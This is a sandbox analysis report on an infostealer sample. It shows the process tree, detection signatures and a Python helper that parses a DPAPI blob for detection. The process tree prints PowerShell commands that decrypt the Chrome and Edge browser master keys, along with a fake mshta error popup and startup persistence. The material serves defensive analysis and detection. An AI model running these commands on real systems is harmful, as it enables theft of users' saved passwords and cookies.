Windows Analysis Report
SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe
Overview
General Information
Detection
Score: 60 (range 0 - 100)
Whitelisted: false
Confidence: 100%
Signatures
Antivirus detection for URL or domain
Drops PE files to the startup folder
Drops large PE files
Tries to harvest and steal browser information (history, passwords, etc)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Enables security privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Searches for the Microsoft Outlook file path
Searches for user specific document files
Sigma detected: Startup Folder File Write
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Classification
Process Tree
- System is w10x64
- SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe (PID: 1164 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Generic.JS.Malicord.D.02514950.1665.6783.exe" MD5: B691AA17712DEA8153BDCAA3FFBDACA4)
- Setup.exe (PID: 6204 cmdline: C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe MD5: B2ED3FF866496C4DBC5873779AF2F7E9)
- cmd.exe (PID: 3772 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 5656 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- Setup.exe (PID: 4196 cmdline: "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1636 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: B2ED3FF866496C4DBC5873779AF2F7E9)
- cmd.exe (PID: 1720 cmdline: C:\Windows\system32\cmd.exe /d /s /c "tasklist" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 2460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- tasklist.exe (PID: 4204 cmdline: tasklist MD5: D0A49A170E13D7F6AEBBEFED9DF88AAA)
- cmd.exe (PID: 2232 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 5384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 4456 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,174,95,142,72,93,217,72), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
- cmd.exe (PID: 3536 cmdline: C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser')" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 3840 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- powershell.exe (PID: 6000 cmdline: powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,30,0,0,0,77,0,105,0,99,0,114,0,111,0,115,0,111,0,102,0,116,0,32,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,14,53,24,103,59,147,206,28,42,108,2,171,66,248,59,252,178,162,35,232,127,115,109,155,94,76,82,107,203,163,4,197,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,102,39,139,236,68,70,39,152,67,111,123,34,177,197,103,181,124,213,190,112,13,193,185,90,191,194,52,69,126,126,90,70,48,0,0,0,78,43,108,139,184,233,18,30,79,160,62,90,54,145,175,184,1,206,218,146,139,219,218,40,3,209,83,56,71,210,79,189,120,174,46,157,101,81,201,76,77,181,151,119,46,253,183,146,64,0,0,0,25,132,83,220,77,72,234,147,112,233,192,145,190,240,42,192,38,154,220,71,203,164,145,111,115,55,19,193,38,168,21,189,120,226,128,178,203,174,136,16,121,184,133,15,28,247,227,66,0,254,38,112,15,247,17,81,12,63,142,85,32,243,79,251), $null, 'CurrentUser') MD5: 04029E121A0CFA5991749937DD22A1D9)
- Setup.exe (PID: 5564 cmdline: "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --mojo-platform-channel-handle=2076 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8 MD5: B2ED3FF866496C4DBC5873779AF2F7E9)
- cmd.exe (PID: 5344 cmdline: C:\Windows\system32\cmd.exe /d /s /c "start /B cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()"" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- conhost.exe (PID: 6704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
- cmd.exe (PID: 6120 cmdline: cmd /c mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
- mshta.exe (PID: 3948 cmdline: mshta "javascript:new ActiveXObject('WScript.Shell').Popup('An error occurred while downloading files. Please try again later.', 0, 'Error', 16);close()" MD5: 0B4340ED812DC82CE636C00FA5C9BEF2)
- Setup.exe (PID: 3364 cmdline: "C:\Users\user\AppData\Local\Temp\2eFAGdfgANPOg197YHkhBxawy9z\Setup.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\Setup" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2480 --field-trial-handle=1840,i,8366561825725198397,2739281923714538764,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2 MD5: B2ED3FF866496C4DBC5873779AF2F7E9)
- Setup.exe (PID: 6980 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Setup.exe" MD5: B2ED3FF866496C4DBC5873779AF2F7E9)
- cleanup
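The two powershell.exe invocations above (PIDs 4456 and 6000) each pass a literal byte array to System.Security.Cryptography.ProtectedData::Unprotect with the CurrentUser scope. That array has the layout of a CryptProtectData (DPAPI) blob, and its description field decodes to "Google Chrome" for PID 4456 and "Microsoft Edge" for PID 6000: this is the os_crypt.encrypted_key that Chromium browsers keep in their "Local State" file, which wraps the key for saved passwords and cookies. The Python below is an added example, not code from the Joe Sandbox report or from the sample; the function names are mine, and the embedded command line is the PID 4456 one from the process tree with the report's line wrapping removed. It parses the blob header offline (no Windows, no decryption) so an analyst or a detection pipeline can tell from a process-creation log alone that the call targets a browser master key, and whose.

```python
import re
import struct
import uuid

# Command line of powershell.exe (PID 4456) from the process tree above, with
# the sandbox's line wrapping removed. The [byte[]] literal is the DPAPI blob
# Chromium stores as os_crypt.encrypted_key in "Local State" (minus its
# "DPAPI" prefix); Unprotect() under the same user returns the 32-byte key that
# wraps the browser's saved passwords and cookies.
POWERSHELL_CMDLINE = (
    "powershell.exe Add-Type -AssemblyName System.Security; "
    "[System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@("
    "1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,"
    "133,249,150,31,215,133,122,74,160,83,200,231,85,194,93,57,16,0,0,0,28,0,0,0,"
    "71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,"
    "0,0,16,102,0,0,0,1,0,0,32,0,0,0,220,99,52,70,203,13,214,237,172,78,180,7,"
    "135,132,222,56,192,222,60,122,2,71,120,79,2,110,200,30,117,75,45,64,0,0,0,0,"
    "14,128,0,0,0,2,0,0,32,0,0,0,84,96,129,36,148,225,154,120,74,75,125,156,249,"
    "147,149,248,25,11,154,223,250,69,31,112,70,8,1,93,107,120,136,224,48,0,0,0,"
    "6,45,27,130,158,227,72,112,46,16,20,247,121,185,158,95,106,75,104,237,172,49,"
    "168,214,157,137,66,208,86,220,45,252,169,85,86,184,103,83,137,130,133,35,244,"
    "129,44,127,163,72,64,0,0,0,35,18,109,136,80,52,198,238,200,236,226,120,27,146,"
    "160,174,71,84,66,203,39,169,215,160,227,44,242,154,161,64,187,142,165,157,66,"
    "1,229,116,228,177,236,99,223,240,230,79,21,58,53,251,1,129,235,77,36,48,152,"
    "174,95,142,72,93,217,72), $null, 'CurrentUser')"
)

# Provider GUID that every CryptProtectData blob carries right after the version.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
CALG_NAMES = {0x6603: "CALG_3DES", 0x6610: "CALG_AES_256",
              0x8004: "CALG_SHA1", 0x800E: "CALG_SHA_512"}
BROWSER_DESCRIPTIONS = {"Google Chrome", "Microsoft Edge"}

BYTE_ARRAY_RE = re.compile(r"\[byte\[\]\]@\(\s*([0-9,\s]+?)\s*\)")


def extract_byte_array(cmdline):
    """Return the [byte[]]@(...) literal as bytes, or None if there is none.
    Whitespace inside the literal is ignored, so the report's wrapped rendering
    ("2 08,140,...") decodes the same as the real command line."""
    m = BYTE_ARRAY_RE.search(cmdline)
    if m is None:
        return None
    values = [int(v) for v in re.sub(r"\s+", "", m.group(1)).split(",") if v]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("byte array literal contains a value outside 0..255")
    return bytes(values)


def parse_dpapi_blob(blob):
    """Walk the CryptProtectData blob header (no decryption, no Windows needed)."""
    off = 0

    def u32():
        nonlocal off
        if off + 4 > len(blob):
            raise ValueError("blob truncated at offset %d" % off)
        (v,) = struct.unpack_from("<I", blob, off)
        off += 4
        return v

    def take(n):
        nonlocal off
        if off + n > len(blob):
            raise ValueError("blob truncated at offset %d" % off)
        chunk = blob[off:off + n]
        off += n
        return chunk

    version = u32()
    provider = uuid.UUID(bytes_le=take(16))
    if version != 1 or provider != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob (version=%d, provider=%s)" % (version, provider))
    u32()                                       # master key version (always 1)
    master_key = uuid.UUID(bytes_le=take(16))   # file name under %APPDATA%\Microsoft\Protect\<SID>\
    flags = u32()
    description = take(u32()).decode("utf-16-le").rstrip("\x00")
    crypt_alg, crypt_bits = u32(), u32()
    salt = take(u32())
    take(u32())                                 # HMAC key (normally empty)
    hash_alg, hash_bits = u32(), u32()
    hmac = take(u32())
    data = take(u32())                          # ciphertext, padded to the cipher block size
    sign = take(u32())
    if off != len(blob):
        raise ValueError("%d trailing bytes after blob" % (len(blob) - off))
    return {
        "master_key_guid": str(master_key),
        "flags": flags,
        "description": description,
        "crypt_alg": CALG_NAMES.get(crypt_alg, hex(crypt_alg)),
        "crypt_bits": crypt_bits,
        "hash_alg": CALG_NAMES.get(hash_alg, hex(hash_alg)),
        "hash_bits": hash_bits,
        "salt": salt.hex(),
        "hmac": hmac.hex(),
        "ciphertext": data.hex(),
        "sign": sign.hex(),
    }


def triage_unprotect_cmdline(cmdline):
    """Detection helper: does this command line hand a DPAPI blob to
    ProtectedData::Unprotect, and which application's secret is it?"""
    if "ProtectedData]::Unprotect" not in re.sub(r"\s+", "", cmdline):
        return None
    blob = extract_byte_array(cmdline)
    if blob is None:
        return {"verdict": "unprotect-call-without-inline-blob"}
    try:
        info = parse_dpapi_blob(blob)
    except ValueError as exc:
        return {"verdict": "unprotect-call-unparseable-blob", "error": str(exc)}
    info["verdict"] = ("browser-master-key-decrypt"
                       if info["description"] in BROWSER_DESCRIPTIONS
                       else "dpapi-unprotect")
    return info


if __name__ == "__main__":
    for key, value in triage_unprotect_cmdline(POWERSHELL_CMDLINE).items():
        print("%-16s %s" % (key, value))
```

Two things worth noting from the parse. The blob is bound to the logged-on user's DPAPI master key (the GUID in the header names the master key file under %APPDATA%\Microsoft\Protect\<SID>\), which is why the sample runs the Unprotect call in the victim's own session rather than exfiltrating the blob; anything running as that user can do the same. For detection, the inline literal is what trips the "Very long cmdline option found" signature above: a powershell.exe command line containing ProtectedData]::Unprotect together with a multi-hundred-element [byte[]]@(...) literal is rare in legitimate use, and the description field tells you immediately which product's key is being recovered.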
No configs have been found
No YARA matches
System Summary
Sigma rule match; author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
Sigma rule match; author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)